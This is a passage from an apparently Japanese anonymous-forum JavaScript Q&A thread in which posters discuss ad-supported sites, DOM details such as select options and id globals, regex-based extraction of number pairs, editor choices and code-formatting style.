所で最近YouTubeの動画冒頭の広告見ないんだがなんでだろう?
意図的に消した記憶はないんだがuBlock originが対応してるのかな?
304 :
2017/02/23(木) 01:14:26.77 ID:???
モノは万が一広告費なんて概念が消失したら値段はむしろ下がる
それぐらい広告費というものは高い
ネットの諸サービス運営ですら無料無広告でやってるところは今でも意外とある

ただ絶対なくなりゃしないがな
305 :
2017/02/23(木) 01:20:34.06 ID:???
hostsでlocalhostに飛ばしてるとかじゃねーの
広告代理店を騙すという意味では受信だけして非表示もありだがトラッキングのことを考えると推奨できたもんではない
仕事のときと個人の立場での主張は別
306 :
2017/02/23(木) 01:24:54.45 ID:???
広告見たところでその商品買うことなんてないからな。
それなら見ないほうがよくね?
広告表示するだけでも広告主は金払ってるだろうし
307 :
2017/02/23(木) 06:26:49.39 ID:???
テキストエリアから入力データを取得するときvalueとhtmlどちらでもできるけど何か違いありますか?
308 :
2017/02/23(木) 06:41:45.23 ID:???
>>307
中身書き換えた後とか、取れる値が変わる
でIEは変わったり変わらなかったりしたはず
とりあえずvalueで(jQueryならval()で)アクセスすりゃ大丈夫
309 :
2017/02/23(木) 08:20:26.54 ID:???
>>303
おっしゃるとおり。価値のある物に相応の値段を払うのは必要。
放送では出来なかったから、CMなんて形が一般化したんだよな。
ただ、価値のある新しい物を、どう新しい価値があります!とドカッと広げたいってニーズもあるので、宣伝ってのをどうするかはまた1つ違う軸で話さなきゃならん。
そう言う意味でアマゾンのダッシュボタンは凄い。
広告同士の検討自体をさせない、という恐ろしい物の売り方。

YouTubeの広告飛ばすんだ。意外。

>>304
それは、無料でやってる部分と課金が必要な部分を、広告部分と広告でない部分、と分けてるだけで、無料分≒広告でしかないよ。
ちと前に流行ったフリーミアムモデルって奴かと。
自社内で完結するからあんまり表に出ないだけで。
310 :
2017/02/23(木) 09:43:25.51 ID:???
このスレのテンプレにすら非フリーミアム運営URLがあるというのに
311 :
2017/02/23(木) 13:21:53.47 ID:???
ビジネスモデルが確立されなければボランティアでもない限り非広告サイトは難しいだろうね
非広告サイトが好ましいことに反論する人はいないだろうけど、営利企業なら利益をあげなければならないからね
312 :
2017/02/23(木) 13:58:16.24 ID:???
非広告サイトにして使い方を書籍で販売、というのが最近の流れでもある
313 :
2017/02/23(木) 15:11:21.76 ID:???
>>311
そもそも一律に広告見せて一律の金取るというのが非効率なんだよ
有料会員だけ広告なしというのも2分化しただけだから然程でもない
それよりも価値を認めてくれた分、金を払ってくれる分貰うと言うのが良い
例えば個人ならAmazonのほしいものリスト晒したり、ギフト券受け付けるようにしたりな
314 :
2017/02/23(木) 15:39:08.77 ID:???
>>313
それはユーザが嬉しいだけでは
効率だけ考えたら一律のほうがw
315 :
2017/02/23(木) 15:40:45.21 ID:???
>>313
今は形を変えてツイートとかいいねになってるんじゃないか?
1円でも10円でも投げ銭システムあればいいけど、入金とかサイトへの設置とかめんどくさいんだよな
316 :
2017/02/23(木) 15:41:17.48 ID:???
というかそれこそクリックして広告踏んでやれよ
317 :
2017/02/23(木) 15:45:39.45 ID:???
そもそも買う側が値段決めるなんて
今の御時世ではリスキーすぎて中々できんだろうなあ
金持ってないキッズたちは1円も払わんだろうし

もしそれがうまくいく優しい世界なら
ウィキペディアは何度も何度も何度も何度も寄付のお願い出さずに済んでるはず
318 :
2017/02/23(木) 16:11:06.19 ID:???
他ならぬWikipedia 寄付のお願い_(ウィキペディア) より

>2014年6月の決算で、ウィキメディア財団の純資産は7700万ドルを超えている[10]。
>そのため、寄付のお願いはウィキペディアの危機を過剰に煽っているのでないかともいわれてきた[9][10]。
>ウィキメディアのソフト開発者であるオリ・リヴネは>財団のメーリングリストに
>「僕が(もちろん限られたものではあるけれど)理解している範囲では、
>いまの我々の財政状態と、お願いにあるような切迫感や懸念は釣り合っていない」と投稿したことがある[15]。
>莫大な寄付金の使途については、「ゴールデン・チェア」とも揶揄された
>職員一人あたり3200ドルに及ぶ家具の購入費が槍玉にあがったこともある[15]。

あんだけ多くのサーバを持ちよくわからん支出状況でも寄付によってこんだけ支えられている

javascriptスレでも良く出てくるMDNは主にGoogleからの収入と寄付によって運営してるのかね
319 :
2017/02/23(木) 17:09:44.57 ID:???
Mozillaの収入の97%は
Firefoxの検索窓のデフォルトをgoogleにしてあげるフィーだと聞いた
320 :
2017/02/23(木) 19:04:11.71 ID:???
JavaScript側でセレクトボックスのある項目をtrueにした場合、それまで選択されていた項目の
selectedは自動的にfalseになりますか?それともtrueが複数存在する形になりますか?
multiple要素は入れていません
現在選択されている項目のselectedをfalseにするコードも一緒に書く必要があるのか気になったのでよろしくお願いします
321 :
2017/02/23(木) 19:13:14.24 ID:???
非multipleなら自動的にselected=trueに変えたoption以外のoptionがfalseになって選択状態も外れる
322 :
2017/02/23(木) 19:32:08.11 ID:???
>>321
ありがとうございます
無駄なコードを記述するところでした
助かります
323 :
2017/02/23(木) 20:32:55.49 ID:???
質問とは関係ないけど、<option>に関して色々JS触ってたら、new Option()ってのがあることに気づいたわ。
new Imageもnew Audioもそうだけど、コンストラクタがある要素ってなんか特別だったりするのかな?
324 :
2017/02/24(金) 09:40:11.99 ID:???
多くが仕様上インターフェイスの写し身として存在するだけの意味のない堅物
325 :
2017/02/24(金) 18:27:37.90 ID:???
console.log(HTMLImageElement == Image); // false
console.log(HTMLImageElement.prototype == Image.prototype); // true in IE,Fx ; false in GC
これはやゔぁい
326 :
2017/02/24(金) 18:30:43.31 ID:???
>>325
問題があるようには見えないが
327 :
2017/02/24(金) 19:11:07.82 ID:???
同じく何が問題なのかわからん
328 :
2017/02/24(金) 20:04:59.74 ID:???
DOM仕様は一応はJSとは分離して作られてるから、
それをJSでどのように実装するかまで決められているわけではない。
Imageは仕様上コンストラクタなので.prototype下にそのようなプロパティを持っておくのは分かるが、
HTMLImageElementはインターフェイス代わりのJS流クラスもどきを仕方なく置いたもの。
でもこれをクラス流に継承してカスタム要素が出来るわけでもないので、そうする必然性はない。
むしろプロトタイプベース的にただのオブジェクトでインターフェイスを表現して簡素なチェーンで良かったと思う。
まあ何れにせよその2つの.prototypeが等しいべきかどうかなんて決めようが無いこと。
329 :
2017/02/24(金) 20:15:36.69 ID:???
実は「やゔぁい」と書きたかっただけで口実はなんでもよかったに一票
330 :
2017/02/25(土) 10:51:51.73 ID:???
ヵッオ やゔぁい
331 :
2017/02/25(土) 16:36:18.01 ID:???
DOM原理主義者vsJQ使い
332 :
2017/02/25(土) 16:37:36.64 ID:???
React派もいるんやで
333 :
2017/02/26(日) 05:33:58.18 ID:???
標準は使いにくいことが分かっているのでDOM原理主義者はいない
DOM.next+マイクロポリフィル派と、jQuery派と、大型フレームワーク派に別れる
334 :
2017/02/26(日) 08:05:58.55 ID:???
JQ使いは数行のスクリプトでもミニパッケージを読ませて無駄なウェイトを作り出す。
335 :
2017/02/26(日) 08:53:18.45 ID:???
申し訳ないがライブラリ論争はNG
336 :
2017/02/26(日) 11:35:15.56 ID:???
>>334
CDNとかキャッシュって知ってる?
毎回jQueryのファイルをダウンロードしてるわけじゃないんだよ
337 :
2017/02/26(日) 12:17:15.17 ID:???
ライブラリの話題はスレ違いなので>>2
338 :
2017/02/26(日) 13:04:32.56 ID:???
無駄なウェイトってどうせ1ミリ秒もないだろうし、
開発時間の無駄なウェイトのほうが重要
339 :
2017/02/26(日) 14:27:44.51 ID:???
そうかね?
最近Googleが出してたと思うけど、
JSの実行時間と同じくらい、ロードとパースに時間かかってるってデータがあったと思うけど。
スマートフォンではそれがまだまだ数百msとかかかる。
340 :
2017/02/26(日) 14:36:13.24 ID:???
jQueryで重いなら、それより数倍重いReactとかAngularとかモバイルでは使えないな
341 :
2017/02/26(日) 17:58:18.19 ID:???
>>2へどうぞ
342 :
2017/02/26(日) 19:59:34.58 ID:???
jquery ui以外でモードレスダイアログを作れるライブラリはありますか?
343 :
2017/02/26(日) 20:03:38.97 ID:???
DOM標準を使え。たしかwindow.showModalDialogとかあっただろ
344 :
2017/02/27(月) 14:57:28.69 ID:???
>>339
JQ使いは知らないんだろ
許してやれw
345 :
2017/02/27(月) 21:46:35.73 ID:???
>>342
コンパクトな答としてはdialog要素のポリフィルかな
https://github.com/GoogleChrome/dialog-polyfill
chromeならネイティブにサポートされてる
346 :
2017/02/27(月) 23:29:50.85 ID:???
ツリービューとかもポリフィルある?
347 :
2017/02/28(火) 15:44:59.61 ID:???
Vue.jsの入門したいのですがなにか良い本とかありませんか?
348 :
2017/02/28(火) 16:55:12.94 ID:???
公式サイト
349 :
2017/02/28(火) 18:20:07.30 ID:???
おまいらjs書くときに何のソフト使ってる?
350 :
2017/02/28(火) 18:24:40.21 ID:???
>>346
ツリービューを実装するネイティブ機能とは何?
351 :
2017/02/28(火) 19:43:49.71 ID:???
エディタのことならVim
352 :
2017/02/28(火) 20:20:21.67 ID:???
最近はVScode
353 :
2017/02/28(火) 20:31:13.11 ID:???
eclipce
354 :
2017/02/28(火) 20:58:45.25 ID:???
eclipse
355 :
2017/02/28(火) 22:31:32.69 ID:???
すまん
356 :
2017/02/28(火) 22:41:16.94 ID:???
>>352
何かたまに固まらね?俺だけ?
357 :
2017/03/01(水) 00:40:21.20 ID:???
前レスのvarで思い出したけど引数はvar無しでも動くけど似たような初期化ルールなど無いの?
358 :
2017/03/01(水) 01:20:34.05 ID:???
varか
359 :
2017/03/01(水) 01:39:57.77 ID:???
>>350
> ツリービューを実装するネイティブ機能とは何?
え? ないの? 困ったなぁ
360 :
2017/03/01(水) 09:39:43.60 ID:???
appendChildが複製じゃなくて移動と気付かずに、でかい要素を複製せず移動させる方法を探し回ってしまった
複製だったらcloneNode必要ないっちゅーねん
361 :
2017/03/01(水) 10:50:18.03 ID:???
>>359
Polyfillとは何かを勉強してから出直しておいで
362 :
2017/03/01(水) 15:38:47.53 ID:???
vim癖ないか?
363 :
2017/03/01(水) 18:11:37.59 ID:???
癖があるからこそ一旦慣れてしまうと戻れない
364 :
2017/03/01(水) 20:40:38.25 ID:???
うちの母ちゃんvim使ってるぞ
365 :
2017/03/01(水) 21:44:44.50 ID:???
スレ違いだから語らんけどVimmerに「癖がある」はほめ言葉
Vimスレおいで
366 :
2017/03/01(水) 23:56:36.93 ID:???
>>356
今のところ一度もフリーズしたことはないな
同じエンジンのAtomより軽いとはいえ起動時ちょっともたつくことはあるけど
367 :
2017/03/02(木) 16:05:49.27 ID:???
jQuery経由で実行すると実行速度が数倍かかるのは避けられないのかな
368 :
2017/03/02(木) 16:10:08.30 ID:???
0.01秒が0.05秒になる程度だと思うけど気になる?
それともjsでそんな重い処理してるの?
369 :
2017/03/02(木) 16:19:02.13 ID:???
ス レ チ
370 :
2017/03/02(木) 19:06:13.50 ID:???
371 :
2017/03/02(木) 22:25:22.42 ID:???
すみません、教えてください
要素を指定するとき getElementByIDやgetElementsBy〜を使うとエラーとなってしまいます
これを使わない方法ならちゃんと動作するのですが、理由が分からずもやもやしています

 document.getElementByID("hoge")  →NG
 document.hoge  →OK
みたいな感じです

参考にしている本やサイトは上の方の書き方しか載っていないので理由が分からず
質問させていただきました
よろしくお願いします
372 :
2017/03/02(木) 22:35:19.48 ID:???
とりあえずgetElementById(”hoge”)のdは小文字
373 :
2017/03/02(木) 22:45:04.07 ID:???
レスありがとうございます
試したら通りました
こんな単純なことで今まで躓いていたんですね……
おかげでもやもやが一つ解けました

ありがとうございました
374 :
2017/03/02(木) 22:51:00.16 ID:???
サジェストが出て来るテキストエディタ使ったほうがいいよ
sublimetextとか、atomとか
375 :
2017/03/02(木) 22:56:28.89 ID:???
コーダーはVSCodeを使っています
なにぶん使いこなせず躓いてばっかりで……

ツールをちゃんと使えるように機能についても覚えなきゃだめですね……
376 :
2017/03/02(木) 22:58:35.38 ID:???
>>367
君は知らないと思うけど、
昔はネイティブじゃないと遅い
377 :
2017/03/02(木) 23:04:32.28 ID:???
VSCodeならそもそも予測変換してくれるから間違えなくない?
378 :
Name_Not_Found
2017/03/02(木) 23:08:41.31 ID:JbuKlGse
書き方が悪いのか予測変換が出たりでなかったりで出ないことの方が多い感じです
出たらラッキーくらいの感じで書いてます
379 :
2017/03/02(木) 23:32:52.15 ID:???
いや、それはまずい
そんなしょーもないとこでつまづくのは本気で時間の無駄だよ
まず出ない原因を探した方が良い

空で打つとgetElementByIdやgetElementsByClassName辺りは普通に間違えるわ
380 :
2017/03/02(木) 23:46:07.74 ID:???
> まず出ない原因を探した方が良い

どうやったら出ますか?
381 :
2017/03/02(木) 23:52:43.50 ID:???
VSCode使わないから知らん
ぱっと思いつくのは
・アプリが重い
・PCがしょぼい
・コーディングを間違えている
var foo;
getEle…
と打てば候補が出るけど、以下のように前の行でセミコロンを忘れているなど、文法ミスしていると出ない
var foo
getEle…
・ファイル拡張子のミス。.txtのファイルだとjsのサジェストが出ない
色々ありすぎて頑張って調べてとしか言えない。
でもこういうツールの設定いじるのってテンション下がるから、飽きてきたら別のツール使ったほうがいいかもしれない
382 :
2017/03/03(金) 00:15:21.63 ID:???
https://microsoft.github.io/monaco-editor/
普通に出るねとしか言えない
383 :
2017/03/04(土) 02:33:21.64 ID:???
Emmet はすごいな!
! で、HTML5のひな形を作ったり、

.a{b$$}*3 で、連番で展開してくれたり、
<div class="a">b01</div>
<div class="a">b02</div>
<div class="a">b03</div>

tac で、text-align: center;
bd+ で、border: 1px solid #000;
m1e で、margin: 1em;

ただ、TeraPad とか、普通のテキストエディタじゃ使えない。
プログラミング用エディタしか使えない

このサイトの、Try it yourself のボタンから、Emmet を試せる
http://docs.emmet.io/
384 :
2017/03/04(土) 02:36:15.55 ID:???
ステマ乙
385 :
2017/03/04(土) 02:38:25.41 ID:???
何がすごいって今更感がすごい
386 :
2017/03/04(土) 06:07:43.54 ID:???
ローカルストレージはドメイン単位で保存容量が割り当てられるの?
387 :
2017/03/04(土) 08:27:26.12 ID:???
違う
ローカルストレージを割り当てられてその中で自分で配分する
388 :
2017/03/04(土) 14:41:45.73 ID:???
>>386
サブドメイン毎10MB程度
389 :
2017/03/04(土) 23:17:03.76 ID:???
これをもっとすんなり書く方法はないでしょうか
MAX[0]=Math.max.apply(null,[list[0]*1,list[2]*1,list[4]*1,list[6]*1]);
MAX[1]=Math.max.apply(null,[list[1]*1,list[3]*1,list[5]*1,list[7]*1]);

そもそも元のlistが悪いってのは
matchで2種類の値を持ってきてるためです
こちらから改善できるようであればそれでもよいのですが・・・
Text="100,90 aiu 90,50 abc 110,111 iroha 123,456"
list=Text.match(/(\d+),(\d+).+?\s(\d+),(\d+).+?\s(\d+),(\d+).+?\s(\d+),(\d+)/).slice(1);
390 :
2017/03/04(土) 23:25:14.01 ID:???
まずMath.max.applyする意味がない

MAX[0] = Math.max(list[0]*1, list[2]*1, list[4]*1, list[6]*1);
MAX[1] = Math.max(list[1]*1, list[3]*1, list[5]*1, list[7]*1);
391 :
2017/03/04(土) 23:26:59.61 ID:???
*1する意味がない

MAX[0] = Math.max(list[0], list[2], list[4], list[6]);
MAX[1] = Math.max(list[1], list[3], list[5], list[7]);
392 :
2017/03/04(土) 23:27:54.20 ID:???
どうでもいいが、もしかして元はIPアドレスとかだったりしない?
*256^3、*256^2、*256^1、*256^0、とか
393 :
389
2017/03/04(土) 23:51:11.44 ID:G8BYGVlo
applyと*1は最初に
var MAX;
ってやっててエラー起こしてるときに試してたものでした
var MAX=[];
にして直ったのでいらなかったんですね
listがvar list;でmatchの結果を読めてたので宣言もよくわかってませんでした

IPではなくある座標をまとめて書いてるテキストですが
IP的な数字だと何か気をつけないとだったりするんです?
394 :
2017/03/04(土) 23:53:21.82 ID:???
DOMの仕様に忠実なコードを書こうと思っています。

IDをつけた要素がwindowオブジェクトのプロパティ、
すなわちグローバル変数になるのはDOMの正しい仕様ですよね。

であれば、以下のコードはDOMの仕様に準拠するという方針の上で
文句言われる筋合いのない正しいコードですよね。

<input id="x" value="123">
<script>
alert(x.value)
</script>
395 :
389
2017/03/04(土) 23:57:02.08 ID:G8BYGVlo
肝心の部分としては本当は
match(/(?:(\d+),(\d+).+?\s)+/).slice(1);
のようにしたり
Math.max(list[even])
のようなことができないでしょうか
ということです
396 :
2017/03/05(日) 00:17:46.65 ID:???
数値のみ抜き出すのでよければできるが?

list = text.match(/\d+/g);
397 :
389
2017/03/05(日) 00:25:20.33 ID:MpDiq+Bv
そうでした例に書いてなくてすみません
間のaiuとかにも数字がある可能性があるので
,を挟んだ数字を指定してます
398 :
2017/03/05(日) 01:04:37.14 ID:???
二回matchを実行する
399 :
2017/03/05(日) 02:34:03.09 ID:???
html内に記述された複数のttp://abcd.comというURLを
bottonタグで制御されたスクリプトのボタンを押したら
abcd.comからefgh.comに変更する
ってのやりたいんだけどどうやるの
400 :
2017/03/05(日) 03:21:59.55 ID:???
>>394
getElementById

>>399
aタグのリンク先(href)をjQueryで変更する
http://www.db.gs/article/402042301.html

String.prototype.replace() で文字列を置換する
401 :
2017/03/05(日) 04:20:24.24 ID:???
button_element.addEventListener( 'click', function(){
 var list = document.getElementsByTagName('a');
 for( var key in list )
  if( list[key].href === 'http://abcd.com/' )
   list[key].href = 'http://efgh.com/';
}, false);

これだけで終わらんか
402 :
2017/03/05(日) 08:27:53.95 ID:???
setTimeoutの使い方について教えてください

(画面を止めない)sleepが欲しい
xhrの通信待ちで画面を止めたくない

上記以外でsetTimeoutを使いたい・使うべき場面はどんなのがあるでしょうか
403 :
2017/03/05(日) 10:53:20.08 ID:???
>>400
そうじゃない。
IDをつけた要素がグローバルになるのは
正しい仕様だって言う話をしてる
404 :
2017/03/05(日) 10:57:42.47 ID:???
>>401
links使ったほうが短くてすむ。これも正しい仕様だ
あとofなw

buttonElement.addEventListener('click', function() {
 var list = document.links;
 for (let key of list)
  if (list[key].href === 'http://abcd.com/')
   list[key].href = 'http://efgh.com/';
}, false);
405 :
2017/03/05(日) 10:59:09.49 ID:???
>>402
一定時間ごとに何か処理したい
406 :
2017/03/05(日) 11:53:12.99 ID:???
>>403
仕様としては正しいが、問題が複数あるので普通は使わない

・HTML Living Standardを実装していない言語では互換性が取れなくなるのでコードの可搬性が下がる(DOMはJavaScriptだけの仕様ではない)
・変数として使用できない名前がid属性値に存在した場合はグローバル変数化されない
・既存のグローバル変数と名前が衝突する為、グローバル変数を定義する度に全てのid属性値を照らし合わせなければならない。新たなid属性値を作る度に全てのJavaScriptコード上で定義されているグローバル変数名を確認しなければならない。

特に3つ目の欠点が非常に痛い
デザイナとコーダが別々ならグローバル変数名を共有しなければやっていけない
自分一人で全てを管理しているなら自分のスタイルを貫き通せるならいいかもしれないが、複数人でコードを共有するならありえない選択だな
407 :
2017/03/05(日) 12:03:39.85 ID:???
>>395
手順を追ってやるしかなんじゃないかね

1. [1,2,3,4,5] の配列に変換
2. Math.max.apply(null, [0,1,2,3,4,5].filter((v,i) => i % 2 === 0));
408 :
2017/03/05(日) 12:08:49.98 ID:???
>>407
> 1. [1,2,3,4,5] の配列に変換
'12,34 hoge 45,56 foo 8,90'.match(/\d+,\d/g).reduce((n,s) => { return Array.prototype.push.apply(n, s.split(',')), n}, []);
409 :
2017/03/05(日) 12:33:09.72 ID:???
>>408
ひどいコードだな。
reduce使うことが目的になってる感があるw
410 :
2017/03/05(日) 12:37:05.14 ID:???
>>409
あなたならどう書きますか?
411 :
2017/03/05(日) 12:47:18.63 ID:???
>>410
const text = "100,90 aiu 90,50 abc 110,111 iroha 123,456";
const values = text.match(/\d+/g);
const list = [[], []];
values.forEach((v, i) => list[i % 2].push(v));
const max = list.map(item => Math.max(...item));

正規表現のところは頑張れ
412 :
2017/03/05(日) 12:54:36.80 ID:???
正規表現がミスってたので /\d+,\d+/g に訂正

ぶっちゃけ、>>408のコードは俺自身も好きではない
最近は関数型コードこそが美しいという風潮があるようなのでreduceを使ったが、俺が書くときはArray.prototype系で配列を回すことはほとんどない
「スコープを短くしろ」と文句言われるのが煩わしいだけ
413 :
2017/03/05(日) 12:56:11.14 ID:???
reduceで計算した結果以外を返すのは筋が悪い
そんなもんにreduce使うなレベル
414 :
2017/03/05(日) 13:13:51.60 ID:???
window.onload = function() {
document.body.innerHTML = document.body.innerHTML.replace(/あいうえお/g,'かきくけこ');
};

こういうbody全体のテキストからタグからjavascriptとか関係なく一括で置換するコードって
クリックで動作出来るように可能?
415 :
2017/03/05(日) 13:15:41.50 ID:???
そう可能?
416 :
2017/03/05(日) 13:15:57.34 ID:???
どう可能?
417 :
389
2017/03/05(日) 15:44:43.25 ID:MpDiq+Bv
みなさんありがとうございます
やはり細かく分けるしかないようですね

そもそも正規表現で
12,34 56,78 90,10

/(?:(\d+),(\d+)\s?)+/
した時に
[全文,90,10]
しか返ってこないという動作は
なにか解説されてる仕様とかあるでしょうか
418 :
2017/03/05(日) 16:54:21.79 ID:???
>>411
>>397の要件はどこにいった?
ぶっちゃけ、>>408が酷くて>>411が良いとする理由がさっぱり分からんのだが
419 :
407
2017/03/05(日) 17:18:23.18 ID:n7SHKUJW
>>417
正規表現で再帰的にマッチさせても全ての () 内の文字列がキャプチャ出来るわけじゃない
また、その書き方だと初めに出現する数字の塊だけを参照する事になる
あなたの書き方に沿うなら2回に分けてマッチさせるか、execをwhileループさせる必要がある
例外処理が適当だが、簡単に書くとこんな感じだな

var match1 = /\d+,\d+(?:\s+\d+,\d+)*/.exec(string),
match2 = match1[0].match(/\d+/g); // 数値文字列を値に持つ配列

あなたの正規表現にならって初めの数値の塊を参照する設計にしてる
未検証なので動かない部分があれば適当に読んでくれ
求められる文字列フォーマットが分からなければ、背景も不明なので現時点で最適解が何なのかは俺にも分からん
420 :
2017/03/05(日) 17:25:38.58 ID:???
>>418

> >>397の要件はどこにいった?



> 求められる文字列フォーマットが分からなければ、背景も不明なので現時点で最適解が何なのかは俺にも分からん
421 :
2017/03/05(日) 17:45:10.67 ID:???
>>389
俺ならこう書くな、読みやすさは大事

let tmp,
 reg = /(\d+),(\d+)/g,
 str = '12,34 56,78 90,10'',
 max = [-Infinity, -Infinity];
while(tmp = reg.exec(str)){
 if(max[0] < +tmp[1]) max[0] = +tmp[1];
 if(max[1] < +tmp[2]) max[1] = +tmp[2];
}
422 :
2017/03/05(日) 17:55:23.55 ID:???
空行、空白も入れないレベルで読みやすさ(笑)
423 :
2017/03/05(日) 17:56:55.56 ID:???
parseIntしろよデコ助と思ってしまう
424 :
2017/03/05(日) 17:59:38.42 ID:???
>>422
おい待て、どこに空白や空行入れる部分があるんだよ?
425 :
2017/03/05(日) 18:04:34.19 ID:???
>>424

let tmp,

 reg = /(\d+),(\d+)/g,

 str = '12,34 56,78 90,10'',

 max = [ -Infinity , -Infinity ];

while ( tmp = reg.exec( str ) )
{

 if ( max[ 0 ] < + tmp[ 1 ] ) max[ 0 ] = + tmp[ 1 ];

 if ( max[ 1 ] < + tmp[ 2 ] ) max[ 1 ] = + tmp[ 2 ];

}
426 :
2017/03/05(日) 18:06:17.85 ID:???
>>424
お前の流派次第だな
どこのスタイルを採用してる?
427 :
2017/03/05(日) 18:10:38.72 ID:???
>>425
目が疲れてる時は若干読みやすいのがむかつくw
428 :
2017/03/05(日) 18:16:04.45 ID:???
>>425
スクロール面倒だから無駄な空行やめろ
あと括弧前後の空白もカーソル移動に無駄な労力がいるから邪魔
画面の情報密度下げんな
429 :
2017/03/05(日) 18:21:47.96 ID:???
見やすさは人によるだろ…職場でちゃんとルールを決めてみんなで守るべき
一人で書くならどう書いても構わん
430 :
2017/03/05(日) 18:23:02.69 ID:???
>>428
もしかして←→キーだけで地道にキャレット移動しちゃう系?
431 :
2017/03/05(日) 18:49:18.05 ID:???
>>430
前後スペース空けていたら単語移動したとき必ずスペースの後ろに止まるわけだが、
お前はわざわざバックスペース余分に打ってスペースから削除して書き直すのか?
で、書き直したあとまた余分なスペース打つのか?
馬鹿らしくね?
432 :
2017/03/05(日) 18:51:50.99 ID:???
わざわざ毎回整形してるの?
最初にエディタに登録して、一段落付いたら全体選択→整形ってやらないの?
433 :
2017/03/05(日) 18:56:36.86 ID:???
>>425の状態だと読むのも編集するのも非効率だって話だが、あえてそんな状態に整形する>>432は間違いなく馬鹿
434 :
2017/03/05(日) 19:00:38.22 ID:???
>>433
>>432だけど別に>>425は推奨してないぞ。ってか>>425はネタだろう
どんだけ文盲やねんw
435 :
2017/03/05(日) 19:11:49.68 ID:???
>>434
普通にThree.jsで使われてるルールだけど?
https://github.com/mrdoob/three.js/blob/master/src/utils.js
436 :
2017/03/05(日) 19:16:54.91 ID:???
>>435
実際使ってる人いるのか、すげぇ・・・
でもそれ、例外でしょ
437 :
2017/03/05(日) 19:28:51.93 ID:???
何故かVB6のコード思いだした。
438 :
2017/03/05(日) 19:29:21.18 ID:???
あのねぇ……
これよく中級者くらいが一度はやってみることだけど
行間ってのはエディタ側で調整すりゃいいのよ
HTMLで表示する時もそう

>>435,436
それはThree.jsで使われているルールではない
あくまで行間設定のできないGitHubに出す時に、整形をかけてるだけ
勘違いするな
439 :
2017/03/05(日) 19:33:22.58 ID:???
> あくまで行間設定のできないGitHubに出す時に、整形をかけてるだけ

なんのためか説明してみてくれる?
440 :
2017/03/05(日) 19:37:34.18 ID:???
なんで「何のためかわからないので教えてください」って素直に聞けないんだろう
441 :
2017/03/05(日) 20:19:56.98 ID:???
何のためって、その方が読みやすいと思ったからとしか考えられないが、他に何かあるか?
確かにライブラリの関数のソースを見たいと思って見に来る人に取っては見やすいかもしれない
大前提として、細かく分割されているのと、通しては眺めないという事があるが
import文なんかは詰めて書いてあるしな
442 :
2017/03/05(日) 21:36:39.91 ID:???
script type="text/javascript" id="hoge">

javascriptってこういう風にid付けても効果あんの?
443 :
2017/03/05(日) 22:20:35.90 ID:???
>>420
最適解が分からんのなら他人のコードにケチつけるなよ
444 :
2017/03/05(日) 22:45:07.33 ID:???
リロードせずindex.htmlを再読み込みするのってどうやるの
445 :
2017/03/05(日) 22:49:31.12 ID:???
ajaxでぐぐれ
446 :
2017/03/05(日) 22:49:35.17 ID:???
>>444
XMLHttpRequest, fetch
447 :
2017/03/05(日) 22:50:23.96 ID:???
>>443
正論
448 :
2017/03/06(月) 00:07:21.16 ID:???
var a = [ 1.jpg, 2.jpg, 3.jpg,・・・10.jpg ]
というリストを
a.jpg, b.jpg, c.jpg・・・の画像に置換しても画面上に反映されず
そのまま数字画像が読み込まれるんだけど
449 :
2017/03/06(月) 00:12:48.28 ID:???
>>448
再現可能なコードを出せ
450 :
2017/03/06(月) 00:14:02.40 ID:???
自分より下を見つけるようなカスばかりわいてワロタ
451 :
2017/03/06(月) 06:30:52.46 ID:???
part20の頃から居るが、今は質問者も回答者もかなりマイルドでまともだぞ。
452 :
2017/03/06(月) 06:34:01.86 ID:???
13年間もここにいるとですか
453 :
2017/03/06(月) 06:52:41.25 ID:???
淡々と質問と回答を繰り返す某言語のスレに昔世話になったことがあるけど
数年ぶりに覗いてみたら基地外の巣窟になってた
454 :
2017/03/06(月) 10:10:09.45 ID:???
part20眺めてたらこのスレの上でやり取りがあった
DOMのプロトタイプ周りの仕様に関する回答があって驚いたw
455 :
2017/03/06(月) 10:12:12.59 ID:???
オマケにnew Optionについての話題もされてるな
十年以上経っても似たようなことばかり話してんだなこれ
456 :
2017/03/06(月) 10:20:28.25 ID:???
part1とか読んでると様々な意味で涙が出てくる
でもどうして今よりずっとマイナーだった2000年代より書き込み数落ちてるんだろうな
457 :
2017/03/06(月) 13:35:46.78 ID:???
ググれば解決することが増えたから
2000年はgoogleが流行りだし始めた時期
458 :
2017/03/06(月) 19:26:31.09 ID:???
>>456
2ch騒動とその直後の専ブラ締め出しあたりから一気に減った
削ジェンヌとJaneStyleと嫌儲民のせい
459 :
NAS6 ◆n3AmnVhjwc
2017/03/07(火) 11:14:54.96 ID:Jxs9oVJ+
>>448
ブラウザのキャッシュをクリアしてみそ
460 :
2017/03/07(火) 13:40:31.94 ID:???
>>417
\sで空白が引っ掛けられてないように見えるけど、全角だったりしない?
461 :
2017/03/07(火) 15:01:42.63 ID:???
>>460
IE8でもなければ\sは全角空白にマッチするだが
462 :
2017/03/07(火) 15:02:08.18 ID:???
var re = /(\d+),(\d+)\s?/y, str = '12,34 56,78 90,10', m, x = [], y = []
while ( m = re.exec(str) ) x.push( +m[1] ), y.push( +m[2] )
;console.log( [ x, y ] )
でいいじゃん
463 :
2017/03/07(火) 18:41:29.58 ID:???
まじかよIE8は全角スペースにマッチしないのかよ
やIE糞
464 :
2017/03/07(火) 22:44:58.74 ID:???
もう今年からこのスレでもIEの話題が出ることほぼ無くなったな
465 :
2017/03/07(火) 22:45:56.60 ID:???
いい傾向だ・・・やっとwebエンジニアの悲願が達成されようとしているのか
466 :
2017/03/07(火) 23:03:00.45 ID:???
edge「呼んだ?」
467 :
2017/03/07(火) 23:23:45.22 ID:???
Edgeはかなりまともだよ
表示確認はChormeだけで十分ってくらい、振る舞いはWebkitに似てるよ
逆にFirefoxの方はデザイン崩れまくってめんどくさい
468 :
2017/03/08(水) 02:55:11.96 ID:???
崩れるお前が悪い
469 :
2017/03/08(水) 08:21:14.20 ID:???
>>468
賛成も否定もできない
レンダリングエンジンは一本にまとめてくれんかねぇ
470 :
2017/03/08(水) 08:40:52.53 ID:???
また自分より下を作ろうと無能不毛してるのかよ。
471 :
2017/03/08(水) 09:43:55.55 ID:???
もうフルCanvasとビットマップ操作で書けば良いよ
崩れることはない
472 :
2017/03/08(水) 12:09:26.85 ID:???
みんな違ってみんないい
473 :
2017/03/08(水) 13:52:13.79 ID:???
悪いのはFirefoxでも製作者でもなくCSS
それも2020年頃までの辛抱
474 :
2017/03/08(水) 14:28:11.43 ID:???
>>450,470
この人自身が「自分より下」とカス呼ばわりしているんだけど、自覚ないのかな
475 :
2017/03/08(水) 17:35:05.31 ID:???
>>474
能力面の上下と人間性がカスかどうかをごっちゃにしてはいけない
476 :
